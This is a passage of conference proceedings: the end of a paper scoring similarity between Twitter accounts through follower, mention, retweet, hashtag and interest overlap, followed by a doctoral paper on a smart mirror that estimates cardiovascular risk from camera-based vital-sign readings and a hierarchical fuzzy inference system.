This part shows all the parameters in detail that are used to find similarity between
two users.
Parameter 1: Followers and Following Relationship
The first parameter that is being used for determining the similarity score is the
follower and following relationship. The number of same accounts both the input
A Contextual Framework to Find Similarity … 799

user and test user follow is directly related to how similar their interests and views
probably are to compute this parameter and first make a list of all the followers of
the accounts in the following list of the input user and another list of following of
followers list of the input user.
Once these two lists are made, check the number of times the test user’s account
shows up in these lists. Every time the account shows up, it adds one point to the
score for the parameter. User has k following and n following of the input user; then,
the total list will be k+n; thus, if the account shows in every list, the max score will
be p+q.
For example, in our case study dataset, the input user, @TomSegura, has 1400 fol-
lowers and 140 following profiles. This means a total of 1540 total lists exist where
the test user’s name has to be checked.
Parameter 2: Mentions
Similarity from mentions is one of the parameters that is being considered in the
proposed formula. If a user mentions another in their tweets, the chances of their
similarity relationship being strong are high. However, if multiple accounts are men-
tioned in the same tweet, this decreases the chance of them being strongly related.
Thus using the formulas shown in Table 1, the mention similarity score is calculated
according to the count of times an account is mentioned and the number of accounts
that are mentioned with it. For example, if Tom mentions an account in one of his
tweets, the number of times he mentions that account in that thread is divided by
the number of accounts mentioned in that particular thread to get the score for the
parameter.
Parameter 3: Retweet Similarity
Retweet similarity is the next parameter in the similarity score calculation. A person
retweets someone’s tweet only if the content of that tweet resonates with them at
some level. This increases the chance that the two are similar. Hence for every tweet
of the test user that is retweeted by the input user, it adds one point to the parameter
score. Retweets were extracted using the Twitter API, and the number of times a
particular account’s tweets have been retweeted is the score of the parameter.
Parameter 4: Like Similarity
Like similarity is one of the parameters in the formula. Examining which tweets
the user likes and if they like any other users tweet usually means they like the
subject matter in the tweet, from this it can be said that these users have something
in common, and there is a chance that they might have similar views. The similarity
score of this parameter is calculated using the formula, and a point is added for every
tweet of the test user liked by the input user. As liking posts on Twitter is a very
common activity, a rather small weight is assigned to this parameter to give it less
importance. Likes were extracted using the Twitter API, and the number of times a
particular account’s tweets have been liked is the score of the parameter.
Parameter 5: Common Hashtags
In this parameter, all the tweets using common hashtags are selected. After getting all
the tweets, sentiment analysis is done. Through that, a negative, neutral, and positive
800 S. Dahiya et al.

score is generated for the tweet. Tweets from both the accounts are compared, and the
ones with common hashtags are extracted. Then, sentiment analysis is done on the
text to see if the content of the tweet is positive, negative, or neutral using Stanford
Core NLP, as both users’ viewpoints may not be the same. The final score of the
parameter is then calculated using the formula in the table.
Parameter 6: Common Interests
Common interests is one of the parameters being used to determine the score for
similarity. Text for each user’s tweets is extracted, and then the topmost used words
are found. These words were then checked in a dictionary containing words related
to topics and subtopics such as politics, entertainment, literature, area, and cooking,
and the person’s top five interests are obtained. The top five interests of both accounts
are then compared, and each matching interest accounts for one point; this gives us
the score for the common interest parameter.
Parameter 7: Profile Similarity
Profile similarity is one of the parameters being used to determine the final similarity
score. It consists of three factors, which are: location, gender, and language. As the
profile’s gender information is not obtainable through Twitter, it was based on the
person’s name. Each matching factor contributes one point to the parameter score.
Through this, the language information from the language usually used in the tweets
is found.
Parameter 8: Topic and List Similarity
The topic similarity is the parameter calculating the number of topics followed by
both, the input user and the test user. The higher the number of topics followed by
both users indicates a higher similarity in content consumed by both on a regular
basis. One common topic in both lists contributes one point to the score. The same
is done for the lists followed by both. The final score is then the summation of the
number of the same topics and lists followed by the users.

4 Results and Analysis

For simulation of proposed framework, the code is written in Python 3.9.0 in Jupyter
Notebook 5.7.4 with the hardware specification as GPU: Intel Iris Plus Graphics 645
1536 MB, processor: Quad-Core Intel Core i5 Processor, speed: 1.4 GHz, number of
processors: 1, and total number of cores: 4.

4.1 Data Extraction

As mentioned earlier, eight parameters are being used to find the similarity between
users. Every parameter generates some score, but for getting the score, data need to
A Contextual Framework to Find Similarity … 801

be extracted to work upon. For each user, data of 8 parameters are extracted for the
calendar year 2020 using Twitter’s API.
So for extracting these data, Twitter API is being used. The extracted data are from
October 2019 to October 2020. These are some APIs that are used.

1. Followers API
2. Liked tweet API
3. Retweet API.
The Twitter API empowers automatic admittance to Twitter in cutting edge and
exceptional manners. It gets used to analyze, learn, and interact with tweets.

4.2 Case Study

It is difficult to measure the similarity between users, and measuring similarity among
users of social media is a rather demanding task as their similarity needs to be judged
based on the content that they have posted or shared on their social media site;
therefore, it is a challenging task to find similarities between users as those users
should be active users on Twitter. The method should work for any average user on
Twitter as it is only dependent on their dataset.
To demonstrate this, a varied set of accounts have been selected from the fields of
entertainment and politics to create a diverse group for our dataset. Each input user
has been compared to the three test users individually, and their percentage similarity
is computed using the parameter scores and the weights assigned to each parameter.
The results of this case study were then compared to a survey of human judges who
decided the similarity of the accounts by arranging them in a descending order of
similarity. We compared this to a similar list made using the percentage similarities
calculated using our proposed methodology, the results of which were found to be
promising.
For analyzing if the method is correct, it has been applied on 2 input users and 3
test users. In this case, the 2 input users are:
@TomSegura—Tom Segura Jr. is a stand-up comedian, writer, and podcaster.
- https://en.wikipedia.org/wiki/TomSegura.
@JoeBiden—Joe Biden is an American politician serving as the 46th and current
president of the USA.
- https://en.wikipedia.org/wiki/JoeBiden
And 3 test users are:
@BertKreischer—Bert Kreischer is a stand-up comedian and reality television
host
- https://en.wikipedia.org/wiki/BertKreischer
@Seanseaevans—Sean Evans is an American producer and YouTuber who is
best recognized for the series Hot Ones.
- https://en.wikipedia.org/wiki/SeanEvans.
802 S. Dahiya et al.

Table 2 Dataset of users for case study


Input users Test users
@TomSegura @BertKreischer
@JoeBiden @SeanEvans
@KamalaHarris

@KamalaHarris—Kamala Harris is an American attorney and politician who


is the 49th and current vice president of the USA-https://en.wikipedia.org/wiki/
KamalaHarris (Table 2).
Table 3 shows the percentage similarity of @TomSegura and @JoeBiden with
@BertKreischer, @SeanEvans, and @KamalaHarris. Through the case study, we
analyze that the people from same industry are more similar to each other.
Norms score—Normalized score,
Wts score—Score after assigning weight.

4.3 Result and Evaluation

This paper presents a system to calculate the percentage similarity of two users on
Twitter. This system takes the profile ID of the users and finds their similarity. If
two users are similar by 25–45 percentage, this means they are quite similar in their
content. While explaining our case study, Tom and Bert are from the same industry
and work together on certain projects, and they should be similar to each other which
is verified by the result that they are 33.5% percentage similar; this means they are
similar users. For the second test user @JoeBiden, it is apparent that he would have
a high similarity percentage to @KamalaHarris’s account as they work closely and
talk about very similar subjects on Twitter.
Using this method, the conclusion reached is that @JoeBiden’s account is
44.44% similar to @KamalaHarris’ account. On the other hand on comparing with
@BertKreisher’s account, a value of 8.02% is justified as they are from completely
different professions and talk engage is very different topics of conversation on
Twitter. Similarly, @TomSegura and @KamalaHarris are not from the same indus-
try either and so their similarity score of 11.40% is also justified. Hence, it is visible
now that this method is effective for finding similarities between Twitter users.
The parameters found have been made in such a way to be easily be used in other
similar social media Web sites. For example, Twitter accounts can be replaced by
Instagram, Facebook, or Snapchat accounts. Tweets can be substituted for profile
bios. In our methodology, “likes” and “shares” from Facebook can be considered
the same as “favorites” and “retweets,” while concepts such as mentions, hashtags,
and replies have almost identical counterparts in these Web sites. Hence with a few
A Contextual Framework to Find Similarity … 803

Table 3 Percentage similarity score


Parameters Tom, bert Tom, sean Tom, kamala
Norms score Wts score Norms score Wts score Norms score Wts score
Following and 3.75 0.375 2 0.2 6.45 0.645
follower
relationship
Mention 6.5 0.65 0 0 0 0
similarity
Retweet 0.43 0.043 0 0 0 0
similarity
Like similarity 0.5 0.05 0.016 0.01 0 0
Hashtag 5 0.5 2 0.2 0.1 0.01
similarity
Common 6 0.6 8 0.8 2 0.2
interest
similarity
Profile 10 1 10 1 6.6 0.66
similarity
Topic 7.14 0.714 2.8 0.28 0 0
similarity
Total score 26.81 17.76 8.91
Percentage 33.5% 22.2% 11.14%
similarity
Parameters Joe, bert Joe, sean Joe, kamala
Norms score Wts score Norms score Wts score Norms score Wts score
Following and 1.9 0.19 1.5 0.15 8.3 0.83
follower
relationship
Mention 0 0 0 0 6.76 0.676
similarity
Retweet 0 0 0 0 1.2 0.12
similarity
Like similarity 0 0 0 0 0 0
Hashtag 1 0 0.1 0.01 10 1
similarity
Common 4 0.4 4 0.4 10 1
interest
similarity
Profile 6 0.6 6 6.6 3.3 0.33
similarity
Topic 0 0 0 0 3.3 0.33
similarity
Total score 6.417 6.191 35.55
Percentage 8.02% 7.73% 44.44%
similarity
804 S. Dahiya et al.

tweaks, this methodology can be used to calculate the percentage similarity of social
media users on various other social media platforms.
Five hundred and twenty-four volunteers were asked to create a list of the test
users, @Bertkreischer, @Seanseaevans, and @Kamalaharris in decreasing similarity
to @Tomsegura and @Joebiden. The results of the survey are compared with a list
made using the percentage similarity calculated using the proposed methodology.
According to the survey results, 92.75% and 87.64% of the volunteers got results
identical to ours. By the technique of mathematical induction, it can be said that this
method works for the majority of users on Twitter as shown, and it produces a fairly
accurate result in our case study consisting of a selection of varied accounts.

5 Conclusion and Future Work

This paper proposes a methodology to find percentage similarity between two users.
This similarity percentage is calculated using eight parameters which are retweets,
liked tweets, followers, following, common hashtags, mention similarity, common
interest, common topic, and list and profile similarity of two Twitter users. Further
work can be done on assigning weights and adding more parameters to better further
this technique.
For comparing its performance, a dataset of 5 users was used, with users from the
fields of entertainment and politics. On comparing the results obtained by the survey,
this method was found to be more efficient and effective than previously done works.
Therefore, this is a highly favorable technique for various real-world applications
such as curating advertisements for users based on interests, recommending content
similar to what is normally consumed by the user, and similar account suggestions.

References

1. Goel, A., Sharma, A., Wang, D., & Yin, Z. (2013). Discovering similar users on Twitter.
Chicago, USA: In Workshop on Mining and Learning with Graphs.
2. Razis, G., & Anagnostopoulos, I. (2016). Discovering similar Twitter accounts using semantics.
Engineering Applications of Artificial,. Intelligence.
3. Vathi, E., Siolas, G., & Stafylopatis, A. (2015). Mining interesting topics in Twitter communi-
ties. In Computational Collective Intelligence. Berlin: Springer.
4. Kamath, K., Sharma, A., Wang, D., & Yin, Z.: RealGraph: User interaction prediction at Twitter.
In Presented at the User Engagement Optimization workshop@ KDD.
5. Dean, J., & Ghemawat, S. (2008). MapReduce: Simplified data processing on large clusters.
Commun ACM.
6. Smith, C. (2016). 170+ Amazing Twitter statistics. DMR.
7. Word Lists by Theme. Wordbanks–EnchantedLearning.com.
8. Gupta, P., Goel, A., Lin, J., Sharma, A., Wang, D., & Zadeh, R., WTF: The who to follow
service at Twitter. In Proceedings of the 22nd International Conference on World Wide Web,
New York, NY, USA.
A Contextual Framework to Find Similarity … 805

9. Socher, R., et al. (2013). Recursive deep models for semantic compositionality over a senti-
ment treebank. In Proceedings of the Conference on Empirical Methods in Natural Language
Processing (EMNLP) (Vol. 1631, p. 1642).
10. Macskass, S. A. (2010). Discovering users topics of inter-est on twitter: A first look. In Pro-
ceedings of the Fourth Workshop on Analytics for Noisy Unstructured Text Data
11. Singh, K. (2016). Clustering of people in social network based on textual similarity. Elsevier
GmbH.
12. Xu, Z. (2011). Discovering user interest on twitter with a modified author-topic model.
13. H. AlMahmoud, & S. AlKhalifa (2018). TSim: A system for discovering similar users on
Twitter.
14. Kalra, S., Johari, R., Dahiya, S., & Yadav, P. (2018). WAPiS: WhatsApp pattern identifica-
tion algorithm indicating social connection. Advanced Computational and Communication
Paradigms.
15. Mohta, A., Jain, A., Saluja, A., & Dahiya, S. (2020). Pre-processing and Emoji Classification of
WhatsApp Chats for Sentiment Analysis Fourth International Conference on I-SMAC. Mobile,
Analytics and Cloud) (I-SMAC: IoT. in Social.
16. Dahiya, S., Mohta, A., & JainText, A. (2020). Classification based behavioural analysis of
WhatsApp chats. In 5th International Conference on Communication and Electronics Systems
(ICCES).
17. Kanungsukkasem, N., & Leelanupab, T. (2016). Power of crowdsourcing in Twitter to find
similar/related users. In 13th International Joint Conference on Computer Science and Software
Engineering (JCSSE).
18. Jiang, J., Lu, H., Li, P., Pan, G., & Xie, X. (2017). Finding influential local users with similar
interest from geo-tagged social media data. In 18th IEEE International Conference on Mobile
Data Management (MDM).
19. Wu, C., Wu, J., Luo, C., Wu, Q., Liu, C., Wu, Y., et al. (2019). Recommendation algorithm based
on user score probability and project type. EURASIP Journal on Wireless Communications and
Networking,.
20. Ahmad, W., & Ali, R. (2018). Understanding the users personal attributes selection tendency
across social networks. In 3rd International Conference On Internet of Things: Smart Innova-
tion and Usages (IoT-SIU).
On the Design of a Smart Mirror for
Cardiovascular Risk Prediction

Gianluca Zaza

Abstract According to the World Health Organization, cardiovascular diseases are


one of the first cause of death. Prevention, together with an healthy life style, could
reduce these high numbers. Moreover, telehealth systems that allow remote and con-
tinuous monitoring of patients can be used for alerting the medical experts if anoma-
lies are detected. In this work, a smart mirror for vital parameters measurements
and cardiovascular risk assessment is proposed. It is a contactless solution, based
on remote photopletysmography (rPPG) that allows natural and easy measurements.
Moreover, a Hierarchical Fuzzy Inference System (HFIS) has been used to predict
the cardiovascular risk level. Finally, the acceptability of the new technology has
been measured, since in the medical domain users need to trust the results obtained
by the automatic techniques. Results have shown that the measurements performed
with the smart mirror are reliable, since they are comparable with the pulse oximeter,
used as baseline. Moreover, the use of HFIS has significantly reduced the number
of rules, while preserving a good accuracy. Finally, Technology Acceptance Model
(TAM) has shown high usability and acceptability values, thus suggesting that the
smart solution can be adopted in daily routine.

Keywords Smart mirror · Internet of things · Telemedicine ·


Photopletysmography · Hierarchical Fuzzy Inference System · Technology
Acceptance Model

1 Introduction

Cardiovascular diseases (CVDs) are one of the main causes of death in the world.
Indeed, the World Health Organization (WHO)1 estimated that in 2016 almost 18
million of deaths were caused by cardiovascular problems. Specifically, the term

1 https://www.who.int/news-room/fact-sheets/detail/cardiovascular-diseases-(cvds).

G. Zaza (B)
Department of Computer Science, University of Bari, Bari, Italy
e-mail: gianluca.zaza@uniba.it

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 807
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_65
808 G. Zaza

CVD includes different disorders that affect the cardiovascular system such as coro-
nary artery disease, cerebrovascular disease, heart attacks, strokes etc. Three are the
main factors that could cause CVDs: unhealthy diets, excessive use of tobacco, and
physical inactivity. Thus, one way to limit CVDs is to promote an healthy life but
the prevention is equally important. On one hand, promoting an healthy life means
carrying out global policies that include, for example, taxing the consumption of
high-sugar foods, building walking, and cyclepaths, providing healthy school meals
in children’s classrooms, etc. On the other hand, education is necessary to prevent
CVD. Particularly, citizens should be aware of the conditions suggesting the onset
of an emergency.
Moreover, monitoring of heart rate, breathing rate, and blood oxygen saturation,
that are the three vital parameters mainly involved in the cardiovascular process, is
necessary to detect in time the worsening of the disease [1].
Usually two medical devices, such as electrocardiogram (ECG) and pulse oxime-
ter, are used to measure these parameters. ECG is a medical device that graphically
records the electrical activity of the heart and its rhythm. The measurements through
ECG require the presence of medical experts to manage the device. On the contrary,
pulse oximeter is a small device that is commonly used for acquiring the measure-
ments from the fingers. It is based on the photoplethysmography (PPG) technology
[2]. A light source is used to illuminate the tissue (e.g., skin) and a photodetector
to measure the small changes in light intensity associated with changes in blood
volume. Both the devices need to be in contact with the skin for a correct measure-
ment. In recent years, thanks to the advancement of technology in the field of digital
cameras and image processing, the measurement of vital parameters through a new
methodology, called remote photoplethysmography (rPPG), has been possible [3]. It
is based on the same technology of PPG but it uses a camera as a photodetector and
the ambient light as a light source, thus avoiding contact. This characteristic allows
new monitoring scenarios where there is no need of contact between the subject and
the measurement devices, and it also does not require the presence of medical experts,
thus it is suitable for telemedicine applications, where parameters are remotely and
continuously acquired and then stored in databases accessed by medical staff only
[4–7].
This paper provides a synthetic description of the ongoing PhD research activity
of the author.
A non-contact vital signs monitoring system based on a see-through mirror has
been proposed. It is equipped with a camera, that captures video frames on patients’
faces. The rPPG signals extracted from the video frames are processed for measuring
heart rate (HR), breathing rate (BR), blood oxygen saturation (SpO2) and the color of
lips. These data are used by a Hierarchical Fuzzy Inference System (HFIS), embedded
in the smart object, for cardiovascular risk level estimation. The goal is to create a
telemedicine solution for domestic use that is both cheap and easy to use.
The rest of the paper is organized as follows: a literature review on rPPG systems
and fuzzy inference systems for CVD is detailed in Sect. 2. From the analysis of the
state-of-the-art research five gaps are pointed out (Sect. 3), and the research goals are
outlined (Sect. 4). Three main hypotheses are then defined (Sect. 5). The proposed
On the Design of a Smart Mirror for Cardiovascular … 809

methodology and the results are reported in sections (Sect. 6) and 7. Finally Sect. 8
concludes this work by outlining future directions.

2 Literature Review

Two main components are critical for the smart mirror that has been proposed:
the measurements module (through rPPG) and the inference system (through FIS).
The state-of-the-art methodologies for these two modules will be described in the
following, by highlighting their limits.
A pioneering work on rPPG was proposed by Verkruysse et al. [3], where it is
described how vital signals can be extracted through video images captured by a
camera. Moreover, Poh described how to use image processing techniques and blind
source separation to obtain the signal from the captured video frames [8]. Takano et
al. [9] have used a charge coupled device (CCD) camera for measuring heart rate and
respiratory rate from a person’s face. In [10], a Microsoft device KinectTM version
2.0 is used to capture vital parameters in real time. While in [11] the camera is used in
a specific real-world context, that is for car drivers’ parameters detection. However,
these works while providing non-invasive monitoring they are difficult to apply in a
real-world setting such as a smart homes.
The first attempt in developing an easy-to-use solution, through the use of a mobile
phone is described in [12]. However, its use could be uncomfortable for elderly
people, since they need continuous monitoring of their vital parameters, and they are
not used to modern technologies. An interesting solution that overcomes these limits
is proposed in [13], where a mirror for monitoring of semeiotic facial signals related
to cardio-metabolic risk is described, and it is shown how this daily object encourages
the users in improving their lifestyle. However, it consists of several sensors, that
make it very difficult to install in a real domestic scenario. On the contrary, the
proposed device is meant for overcoming all the previously described issues. Indeed,
a smart mirror has been developed, that thanks to a camera embedded in its structure,
is able to acquire video frames of the subjects and thus to derive the vital parameters
measurements. While as in [13], the choice of a common object enhances the users
willingness to use it, low-cost components have been used, and a ready to use smart
object is proposed, thus avoiding hardware and software configurations.
Afterward, the data collected are sent to a Fuzzy Inference System (FIS) that
returns cardiovascular risk level. FISs have shown to be very useful and reliable in
the medical field because of their ability to manage uncertainty and vagueness that
are proper of this domain [14]. Thanks to their generality, they have been used as
decision support systems for different diseases, such as diabetes [15], eye diseases
[16], hypertension [17], and neurodegenerative diseases [18–20], just to mention
few.
With the aid of medical experts, a FIS for cardiovascular risk level estimation has
been proposed in [21]. While the accuracy of the defined FIS was high, the number of
rules grew exponentially with the number of the input variables, hence the resulting
810 G. Zaza

rule base was quite complex. Reducing the number of rules is mandatory in order to
improve interpretability [22]. So, in order to solve the “curse of dimensionality” that
occurs in flat FISs, HFISs have been effectively used in several fields [23]. However,
very few works use HFISs in the medical field. In [24], it is used to evaluate and
measure the effects of rehabilitation in post-stroke patients while in [25] it is used to
diagnose Dengue fever. Thus, previously FIS has been improved by designing and
implementing an HFIS for cardiovascular risk assessment.

3 Research Gaps

With regard to the two components described in Sect. 2, five main gaps have been
identified in state-of-the-art approaches:
G 1 : They are no suitable for a daily use in a smart home scenario where the user
easily adopts the device in his normal routine;
G 2 : The mirrors for parameters estimation do not measure blood oxygen saturation;
G 3 : Several telehealth systems for cardiovascular measurements have been pro-
posed, however they focus on the technical issues related to data privacy and
communication while ignoring the measurements of the parameters that are per-
formed with common devices;
G 4 : Fuzzy logic is suitable to describe medical concepts and reasoning about them.
However, the number of rules in flat FISs grows with the number of input vari-
ables, thus techniques for reducing their complexity are needed. To this aim,
HFISs have proven to be effective, however few works use them in the medical
domain, and none of them focus on cardiovascular disease;
G 5 : Usability and acceptability are two crucial issues when dealing with users that
are no technicians, and they enhance the user trustability of the automatic devices.
There are no works that explore this aspect in smart objects for cardiovascular
decision support systems.

4 Objectives

Starting from the research gaps that have been identified in the previous phase, five
research objectives have been defined.
O1 : Develop a contactless and easy-to-use smart device for cardiovascular risk
assessment, that can be used during the daily routine at home;
O2 : Develop a smart mirror that is able to measure four vital parameters, namely
heart rate, breath rate, blood oxygen saturation, and color of lips;
O3 : Embed the smart mirror in a telemedicine environment;
O4 : Define a Hierarchical Fuzzy Inference System for cardiovascular risk assess-
ment;
On the Design of a Smart Mirror for Cardiovascular … 811

O5 : Evaluate the acceptability of the new proposed technology, to final users.

5 Hypothesis

On the basis of the research gaps and the research objectives, three main hypotheses
have then been defined and they will be verified in the following paragraph.
H1 : A smart mirror is able to accurately measure the four vital parameters, useful
to derive cardiovascular risks. The use of rPPG, together with signal and video
processing techniques, allows contactless measurements of the parameters;
H2 : Hierarchical fuzzy inference systems are suitable predictors for cardiovascular
risk levels. Moreover, the use of HFISs, instead of flat FISs, allows the reduction
of number of rules;
H3 : The use of a common object, as the mirror is, improves the acceptability of
the new technology to users, thus enhancing its use and its effectiveness for
prevention.

6 Methodology

With regard to the hypothesis H1 a smart mirror, shown in Fig. 1, has been developed
to acquire facial video frames used to extract the rPPG signal and then the four
vital parameters defined before. Cheap components have been used for the hardware
architecture: a monitor to show messages, acrylic film that is partially reflective and
transparent, a wood frame, and a camera [26, 27]. The current prototype is based on
a client/server architecture that is used for processing.
A software pipeline has then been defined to process the acquired video frames
and extract vital parameters values from signals.
The processing starts with real-time face identification from short video frames
acquired through the camera. A preliminary 26 s cycle is required to correct camera
distortion and then just 2 s are necessary for each measurement. Python libraries for
video and signal processing have been used. Particularly, OpenCv2 to capture and
process video frames; Dlib with a pretrained frontal detector3 to identify the area of
the frame containing the face and facial landmark detection4 to obtain a set of 68
facial landmarks [28]. Then three region of interests (ROIs) are selected based on
their significance in blood passage modulation, and a fourth ROI is used to reduce
signal distortion due to facial movements.
The RGB signals coming from the ROIs are used to estimate the vital parameters.
Particularly, a signal matrix is obtained by averaging the pixels of each RGB chan-

2 https://pypi.org/project/opencv-python/.
3 http://dlib.net/.
4 http://dlib.net/imaging.html#shape_predictor.
812 G. Zaza

Table 1 Mean absolute error and standard deviation obtained by comparing our contactless system
and the pulse oximeter
All subjects Healthy subjects Unhealthy subjects
HR 3.45 ± 2.93 2.87 ± 2.39 4.90 ± 3.74
SpO2 1.83 ± 2.43 1.54 ± 1.76 2.56 ± 3.63

nels and of each ROI. Afterward, noise reduction techniques as the Finite Impulse
Response [29], the Chrominance method [30] and linear interpolation are used to
obtain a more robust signals. Finally, the most informative ROI is used to evaluate
the vital signals as suggested in [3, 8, 31]. Lip color was obtained by extracting and
analyzing a specific ROI that includes the mouth. K-means algorithm was applied
to quantify the predominant color in the ROI, from the resulting three main colors
in RGB format. With respect to H2 , an HFIS was developed starting from a flat FIS
rule base defined with the help of a clinician in [21]. The linguistic variables and
the related fuzzy sets have been modeled by using the FISDET tool [32]. The HFIS
consists of three FISs organized in a hierarchical fashion. Each FIS has two input
variables and one output variable. Intermediate input/output variables have been used
between the three levels. The final output is provided by the last layer. and it repre-
sents the cardiovascular risk level. On the overall, HFIS rules base include 27 rules
instead of 81 that were defined in the flat FIS.
With respect to H3 Technology Acceptance Model (TAM) was used and in vivo
experiments have been conducted to evaluate the acceptability of the new technology
to final users. A questionnaire, was defined, according with the TAM methodology,
and users were asked to fill it, after having used the smart mirror [33].

Fig. 1 Example of vital


parameters measurements
through the smart mirror
On the Design of a Smart Mirror for Cardiovascular … 813

7 Interpretation of Results

With regard to the hypothesis H1 , experiments have been conducted in order to verify
the effectiveness of the proposed smart mirror in measuring the four vital parameters.
The values of HR and SpO2 obtained with our system have been compared with
those measured by pulse oximeter, that is used as baseline. Breath rate and lips
color accuracy, could have not been evaluated, since there is not a gold standard
to compare them with. In-vivo experiments were conducted, subjects were required
to sit in front of the mirror, at a distance of about 50 cm. Measurements with the
smart mirror and the pulse oximeter have been conducted simultaneously, for a fair
comparison. Results have shown that the two measurements are in agreement since
a good correlation is obtained [26].
Moreover, since blood oxygen saturation is a good marker for COVID-19 pres-
ence, further experiments have been conducted by considering only this parameter.
Also, in this case, a high level of agreement has been obtained between the system
measurements and the baseline [34].
With regard to the hypothesis H2 , experiments have been conducted to compare
the performance of the defined HFIS and its flat FIS version [21], in terms of accu-
racy and number of rules. A dataset of 116 subjects was collected and labeled by
experts, assigning a risk level (Low, Medium, High, Very High). A total of 12 HFIS
configurations was firstly created by combining all the input variables. Then, the best
HFIS has been compared with the flat FIS, and overall accuracy values of 71.55%
and 69.97% were obtained, respectively [35]. Table 2 shows the classification per-
formance of both FIS and HFIS, for each risk level, in terms of accuracy (ACC),
True Positive and Negative Rate (TPR, TNR) and Positive and Negative Predictive
Values (PPV, NPV). As overall evaluation, we observe that HFIS performs better
for extreme risk classes than the original FIS. In light of total better accuracy and
focusing on the major importance of discriminating extreme classes in the context
of cardiovascular disease domain, HFIS has been preferred to FIS. Moreover, as
previously said, the number of rules has been drastically reduced thus enhancing
the explainability of the inference system. With regard to H3 , 30 subjects have been
involved in the study through TAM. Six main research questions were identified
regarding social and demographic factors, benefits, risks and privacy, usability and
acceptance, and for each of them a set of questions were defined according to the

Table 2 Classification results of HFIS and FIS


HFIS FIS
Risk ACC TNR TPR PPV NPV ACC TNR TPR PPV NPV
Low 0.76 0.80 0.14 0.04 0.93 0.83 1.00 0.77 1.00 0.60
Medium 0.76 0.80 0.14 0.04 0.93 0.75 0.76 0.57 0.13 0.96
High 0.91 0.97 0.12 0.25 0.94 0.91 0.94 0.50 0.40 0.96
Very 0.91 0.97 0.53 0.73 0.93 0.88 0.96 0.40 0.60 0.91
high
814 G. Zaza

Fig. 2 Averaged perception


of users about the main
considered factors

TAM guidelines. Results in Fig. 2 have shown a general positive feeling toward our
self-care monitoring solution, both among young and old people [33].

8 Conclusion

In this work, a smart mirror that is able to measure vital sign parameters from short
video frames of the user’s face has been developed. Moreover, a Hierarchical Fuzzy
Inference System has been designed with the aim of medical experts, in order to
automatically predict the cardiovascular risk level, from the analysis of the measured
parameters. Experiments have shown the effectiveness of the proposed approach in
both the measurement and predictive tasks. Moreover, since the stakeholders are not
necessary technicians, the acceptability of this new technology has been evaluated
through TAM and positive results have been collected.
Future works will be addressed to conduct massive experiments in hospitals and
medical facilities in order to learn rules and fuzzy sets through a neuro-fuzzy sys-
tem [36]. Moreover, a telemedicine system which embeds the smart mirror will be
developed, as defined in objective O3 .

References

1. Cook, S., Togni, M., Schaub, M. C., Wenaweser, P., Hess, O. M. (2006). High heart rate: A
cardiovascular risk factor? European Heart Journal, 27(20), 2387–2393
2. Allen, J. (2007). Photoplethysmography and its application in clinical physiological measure-
ment. Physiological Measurement, 28(3), R1.
3. Verkruysse, W., Svaasand, L. O., & Nelson, J. S. (2008). Remote plethysmographic imaging
using ambient light. Optics Express, 16(26), 21434–21445.
4. Alzubi, J., Manikandan, R., Alzubi, O., Gayathri, N., & Patan, R. (2019). A survey of specific
iot applications. International Journal on Emerging Technologies, 10(1), 47–53.
On the Design of a Smart Mirror for Cardiovascular … 815

5. Alzubi, J., Selvakumar, J., Alzubi, O., & Manikandan, R. (2019). Decentralized internet of
things. Indian Journal of Public Health Research and Development, 10(2), 251–254.
6. Raj, R. J. S., Shobana, S. J., Pustokhina, I. V., Pustokhin, D. A., Gupta, D., & Shankar, K.
(2020). Optimal feature selection-based medical image classification using deep learning model
in internet of medical things. IEEE Access, 8, 58006–58017.
7. Abdulkareem, K. H., Mohammed, M. A., Salim, A., Arif, M., Geman, O., & Gupta, D., et al.
(2021). Realizing an effective covid-19 diagnosis system based on machine learning and iot in
smart hospital environment. IEEE Internet of Things Journal, 1–1.
8. Poh, M. Z., McDuff, D. J., & Picard, R. W. (2010). Non-contact, automated cardiac pulse mea-
surements using video imaging and blind source separation. Optics Express, 18(10), 10762–
10774.
9. Takano, C., & Ohta, Y. (2007). Heart rate measurement based on a time-lapse image. Medical
Engineering & Physics, 29(8), 853–857.
10. Bosi, I., Cogerino, C., & Bazzani, M. (2016). Real-time monitoring of heart rate by processing of
microsoft kinectTM 2.0 generated streams. In 2016 International Multidisciplinary Conference
on Computer and Energy Science (SpliTech), pp. 1–6
11. Zhang, Q., Wu, Q., Zhou, Y., Wu, X., Ou, Y., & Zhou, H. (2017). Webcam-based, non-contact,
real-time measurement for the physiological parameters of drivers. Measurement, 100, 311–
321.
12. Scully, C. G., Lee, J., Meyer, J., Gorbach, A. M., Granquist-Fraser, D., Mendelson, Y., et al.
(2012). Physiological parameter monitoring from optical recordings with a mobile phone. IEEE
Transactions on Biomedical Engineering, 59(2), 303–306.
13. Colantonio, S., Coppini, G., Germanese, D., Giorgi, D., Magrini, M., Marraccini, P., Martinelli,
M., Morales, M. A., Pascali, M. A., Raccichini, G., Righi, M., Salvetti, O. (2015). A smart
mirror to promote a healthy lifestyle. Biosystems Engineering, 138, pp. 33–43. Innovations in
Medicine and Healthcare.
14. Alonso, J. M., Castiello, C., Lucarelli, M., Mencar, C. (2013). Modeling interpretable fuzzy
rule-based classifiers for medical decision support. In Data mining: Concepts, methodologies,
tools, and applications, (pp. 1064–1081). IGI global
15. Lee, C., & Wang, M. (2011). A fuzzy expert system for diabetes decision support application.
IEEE Transactions on Systems, Man, and Cybernetics, Part B (Cybernetics), 41(1), 139–153
16. Ibrahim, F., Ali, J. B., Jaais, A. F., Taib, M. N. (2001). Expert system for early diagnosis of eye
diseases infecting the malaysian population. In Proceedings of IEEE Region 10 International
Conference on Electrical and Electronic Technology. TENCON 2001 (Cat. No.01CH37239).
Vol. 1. pp. 430–432.
17. Das, S., Ghosh, P., Kar, S. (2013). Hypertension diagnosis: A comparative study using fuzzy
expert system and neuro fuzzy system. In 2013 IEEE International Conference on Fuzzy
Systems (FUZZ-IEEE) (pp. 1–7)
18. Lella, E., & Vessio, G. (2020). Ensembling complex network ‘perspectives’ for mild cognitive
impairment detection with artificial neural networks. Pattern Recognition Letters, 136, 168–
174.
19. Vessio, G. (2019). Dynamic handwriting analysis for neurodegenerative disease assessment:
A literary review. Applied Sciences, 9(21), 4666.
20. Lella, E., Pazienza, A., Lofù, D., Anglani, R., & Vitulano, F. (2021). An ensemble learning
approach based on diffusion tensor imaging measures for alzheimer’s disease classification.
Electronics, 10(3), 249.
